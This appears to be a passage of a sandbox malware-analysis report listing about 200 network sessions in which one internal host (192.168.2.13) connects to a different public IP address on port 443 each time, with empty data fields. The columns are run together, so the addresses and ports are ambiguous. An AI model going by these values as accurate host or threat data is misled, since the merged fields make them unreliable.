                                                  14106192.168.2.1347828216.174.201.118443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14107192.168.2.1337916142.70.7.232443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14108192.168.2.134296692.194.71.26443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14109192.168.2.134982067.241.18.63443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14110192.168.2.133753223.164.232.10443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14111192.168.2.1360916171.214.91.15443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14112192.168.2.1354648129.16.171.252443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14113192.168.2.1337932176.105.41.77443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14114192.168.2.1352070116.51.165.39443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14115192.168.2.133361262.225.144.36443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14116192.168.2.1348554118.20.105.176443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14117192.168.2.1334778130.184.98.111443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14118192.168.2.1337540168.85.232.210443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14119192.168.2.1345324194.172.159.182443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14120192.168.2.1352590117.113.148.29443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14121192.168.2.133520068.210.97.170443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14122192.168.2.1337132176.106.142.88443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14123192.168.2.135791250.227.222.53443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14124192.168.2.1348312128.53.100.41443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14125192.168.2.134545460.197.89.26443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14126192.168.2.135978472.31.6.92443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14127192.168.2.1333040217.235.203.153443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14128192.168.2.133914061.94.47.170443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14129192.168.2.1359062170.112.218.181443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14130192.168.2.1359128113.138.14.92443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14131192.168.2.133976676.191.65.47443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14132192.168.2.135550675.69.236.255443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14133192.168.2.1349314105.98.21.181443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14134192.168.2.1347626217.46.132.85443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14135192.168.2.1336286219.189.183.7443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14136192.168.2.13534142.185.153.22443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14137192.168.2.1338562112.231.226.32443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14138192.168.2.134230453.242.120.249443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14139192.168.2.135431613.218.154.186443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14140192.168.2.1351582102.246.13.67443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14141192.168.2.134934697.52.89.83443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14142192.168.2.135833277.12.235.208443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14143192.168.2.135493494.183.108.139443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14144192.168.2.1350108136.108.167.168443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14145192.168.2.1350834140.5.120.52443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14146192.168.2.1351492168.84.40.5443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14147192.168.2.1344806154.124.244.47443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14148192.168.2.1343408136.137.134.228443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14149192.168.2.134842042.157.41.240443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14150192.168.2.134052257.33.238.141443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14151192.168.2.1345790188.184.89.158443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14152192.168.2.1339256198.45.39.194443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14153192.168.2.133862035.210.30.230443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14154192.168.2.1354634125.43.105.194443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14155192.168.2.1343068120.233.74.203443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14156192.168.2.135012214.200.42.162443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14157192.168.2.134667066.94.26.230443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14158192.168.2.1338470152.244.242.12443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14159192.168.2.1338226151.118.34.121443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14160192.168.2.1352230185.66.95.192443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14161192.168.2.134785225.210.205.80443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14162192.168.2.1348760192.245.27.96443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14163192.168.2.1333316123.145.71.189443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14164192.168.2.134494493.122.210.91443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14165192.168.2.1359158149.201.37.195443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14166192.168.2.134466480.121.255.60443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14167192.168.2.1355166115.75.88.231443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14168192.168.2.1345908131.67.222.25443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14169192.168.2.1359184178.170.16.10443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14170192.168.2.1340740182.167.29.179443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14171192.168.2.1345402182.137.131.234443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14172192.168.2.133479481.184.251.218443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14173192.168.2.1340448162.100.78.213443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14174192.168.2.1337598122.134.238.242443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14175192.168.2.135360238.153.166.122443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14176192.168.2.1343398170.60.156.191443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14177192.168.2.133704257.102.95.108443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14178192.168.2.134491088.28.135.247443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14179192.168.2.1353740120.28.81.199443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14180192.168.2.1350868125.178.246.242443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14181192.168.2.1340592150.79.132.244443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14182192.168.2.1351770108.207.93.83443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14183192.168.2.1341912151.112.243.94443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14184192.168.2.135273240.48.198.105443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14185192.168.2.135449058.77.6.185443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14186192.168.2.1339764194.246.50.196443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14187192.168.2.1342722223.24.188.160443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14188192.168.2.1349136175.57.56.196443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14189192.168.2.1332830107.70.157.75443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14190192.168.2.135212638.218.240.204443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14191192.168.2.1340250211.183.114.47443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14192192.168.2.134469664.49.70.254443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14193192.168.2.1345620168.153.45.65443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14194192.168.2.1355902197.224.32.165443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14195192.168.2.1334472143.231.115.34443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14196192.168.2.1341916108.129.176.145443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14197192.168.2.1344516134.23.182.179443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14198192.168.2.1345836134.77.149.160443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14199192.168.2.133556252.1.194.133443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14200192.168.2.134459839.133.60.15443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14201192.168.2.1333348175.157.58.83443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14202192.168.2.1346862139.73.128.151443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14203192.168.2.135885653.254.61.89443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14204192.168.2.1344444102.161.195.85443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14205192.168.2.1352170116.17.119.64443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14206192.168.2.1334528220.103.73.244443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14207192.168.2.1341832219.80.84.159443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14208192.168.2.1339800109.109.221.146443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14209192.168.2.134448494.232.112.185443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14210192.168.2.1349868151.244.142.69443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14211192.168.2.135817484.116.138.254443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14212192.168.2.1336590140.209.132.231443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14213192.168.2.1355508196.50.28.189443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14214192.168.2.1333228206.15.222.15443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14215192.168.2.1354324220.225.249.59443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14216192.168.2.135515449.102.180.184443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14217192.168.2.1335256104.176.29.58443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14218192.168.2.136064298.143.142.183443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14219192.168.2.1340156199.155.134.95443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14220192.168.2.1347154219.175.71.195443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14221192.168.2.1344250205.7.44.104443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14222192.168.2.134539694.242.100.166443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14223192.168.2.133579091.43.63.70443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14224192.168.2.1336936138.188.160.21443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14225192.168.2.1338298134.232.245.243443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14226192.168.2.135315277.73.74.90443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14227192.168.2.1360308123.171.254.1443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14228192.168.2.135878453.104.88.62443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14229192.168.2.135149885.205.19.119443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14230192.168.2.1352890181.189.103.85443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14231192.168.2.1338220146.126.182.59443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14232192.168.2.1359598222.168.206.101443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14233192.168.2.133548487.186.238.1443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14234192.168.2.133791264.58.135.129443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14235192.168.2.135986681.205.34.56443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14236192.168.2.1339948146.14.175.22443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14237192.168.2.1348214145.129.170.150443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14238192.168.2.1335250146.157.94.16443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14239192.168.2.1358066219.50.126.101443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14240192.168.2.135457487.93.124.217443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14241192.168.2.134484884.200.206.255443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14242192.168.2.135435842.106.152.208443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14243192.168.2.134346448.11.77.17443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14244192.168.2.1349978129.85.229.75443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14245192.168.2.1336566163.92.30.166443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14246192.168.2.1356756165.121.247.73443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14247192.168.2.1341988179.102.134.42443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14248192.168.2.135157645.139.168.222443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14249192.168.2.1341732149.157.71.41443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14250192.168.2.1348910175.114.51.87443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14251192.168.2.1355476191.175.139.56443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14252192.168.2.13337121.159.250.97443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14253192.168.2.133337235.37.62.182443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14254192.168.2.1355802196.127.94.215443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14255192.168.2.135135025.178.178.59443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14256192.168.2.1354632161.101.96.80443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14257192.168.2.135704832.35.34.50443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14258192.168.2.133659248.224.150.228443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14259192.168.2.136027245.195.224.38443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14260192.168.2.1343078104.175.53.19443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14261192.168.2.1338552161.198.119.241443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14262192.168.2.133471277.127.121.36443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14263192.168.2.1335150160.231.50.108443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14264192.168.2.1335882191.114.20.224443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14265192.168.2.1340976209.94.156.184443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14266192.168.2.133423812.247.141.17443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14267192.168.2.1337640175.85.1.80443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14268192.168.2.135124296.235.145.24443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14269192.168.2.1347816125.173.17.84443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14270192.168.2.134911618.96.101.142443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14271192.168.2.1346030101.74.151.106443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14272192.168.2.134834217.107.53.173443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14273192.168.2.1343032221.82.136.100443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14274192.168.2.135873424.83.52.49443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14275192.168.2.134077841.138.13.127443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14276192.168.2.1360610191.65.149.68443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14277192.168.2.133463442.35.200.135443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14278192.168.2.136020695.244.35.99443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14279192.168.2.1333844137.192.104.216443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14280192.168.2.1358690177.193.107.216443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14281192.168.2.133867289.97.228.142443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14282192.168.2.133687647.43.67.59443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14283192.168.2.1337360186.76.213.207443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14284192.168.2.135517898.229.54.80443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14285192.168.2.133837276.33.28.161443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14286192.168.2.13521228.19.110.197443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14287192.168.2.134513631.159.23.113443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14288192.168.2.1343262149.212.43.191443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14289192.168.2.1359098219.73.193.75443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14290192.168.2.1333524168.253.61.206443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14291192.168.2.1356274180.94.144.221443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14292192.168.2.1356716179.23.187.86443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14293192.168.2.1348468146.201.167.28443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14294192.168.2.133699699.82.99.7443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14295192.168.2.13551684.110.237.92443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14296192.168.2.1358524155.76.115.195443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14297192.168.2.1350086181.221.29.120443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14298192.168.2.1335620182.226.18.70443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14299192.168.2.1341368186.122.165.138443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14300192.168.2.135145696.240.136.240443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14301192.168.2.1339036190.69.67.135443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14302192.168.2.1353430177.10.161.92443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14303192.168.2.13585522.200.214.234443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14304192.168.2.1337010121.189.103.40443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14305192.168.2.1354434219.195.23.63443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14306192.168.2.1345646109.223.27.141443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14307192.168.2.135853419.167.191.33443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14308192.168.2.1360770176.227.44.103443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14309192.168.2.1341996193.61.84.175443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14310192.168.2.1335572187.178.19.245443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14311192.168.2.134771646.52.198.73443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14312192.168.2.1350902104.233.18.77443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14313192.168.2.1357736160.140.196.229443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14314192.168.2.1347198187.53.176.30443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14315192.168.2.134539293.25.156.39443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14316192.168.2.133574658.207.54.58443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14317192.168.2.133926469.72.184.237443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14318192.168.2.133592244.33.136.95443
